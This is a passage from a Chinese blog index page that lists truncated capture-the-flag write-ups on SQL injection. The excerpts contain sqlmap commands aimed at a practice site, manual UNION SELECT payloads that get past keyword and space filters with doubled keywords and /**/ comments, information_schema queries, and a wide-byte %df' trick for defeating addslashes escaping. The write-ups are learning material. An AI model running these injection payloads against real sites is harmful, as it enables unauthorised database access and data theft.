sql
klsfct
keep learning stayfoolish continue thinking
展开
-
SQL(sqlmap工具)
输入1,页面显示hello,输入1',页面报错1.报数据库 --dbssqlmap.py -u http://ctf5.shiyanbar.com/web/index_3.php?id=1 --dbs2.猜表段 --tables (需指定数据库 -D 数据库名)sqlmap.py -u http://ctf5.shiyanbar.com/web/index_3.php?id=1 --t...原创 2018-03-30 15:32:06 · 114 阅读 · 0 评论 -
SQL手工类(过滤)
1.手工!!!发现union select 被过滤之后通过输入查表字段,发现union select 被过滤了,这是想到用两个union表示重复输入union select后发现空格也被过滤了,继续用两个空格代替一个空格1.查询当前数据库1' unionunion selectselect database()'2.查询数据库中的表1' unionunion selectselect ...原创 2018-03-30 15:24:38 · 150 阅读 · 0 评论 -
SQL
试着先输入1,再输入1',页面报语法错误,再输入1 '页面出现SQLi detected!, 推出空格被它过滤了接下来有两种方法:用sqlmap或者手注先手注过滤的空格可以用/**/代替,查询当前数据库的表'/**/or/**/id=4/**/union/**/select/**/table_name/**/from/**/information_schema.tables/**/where...原创 2018-03-30 23:41:02 · 161 阅读 · 0 评论 -
post提交
There is no martial art is indefectible, while the fastest speed is the only way for long success.</br>>>>>>>----You must do it as fast as you can!----<<<<<<&原创 2018-04-03 17:27:56 · 1507 阅读 · 0 评论 -
宽字节(宽字符)注入
了解了很多的web后端验证的问题,特别是与数据库交汇的这部分我觉得有很大一部分吧,是需要长期的积累, 知识的学习本来是就是互相推翻之前学习的成果,然后建立新的思想,巩固自己的思维发展 字节注入也是在最近的项目中发现的问题,大家都知道%df’ 被PHP转义(开启GPC、用addslashes函数,或者icov等),单引号被加上反斜杠\,变成了 %df\’,其中\的十六进制是 %5C ,那么现在 ...转载 2018-09-11 03:42:29 · 1208 阅读 · 0 评论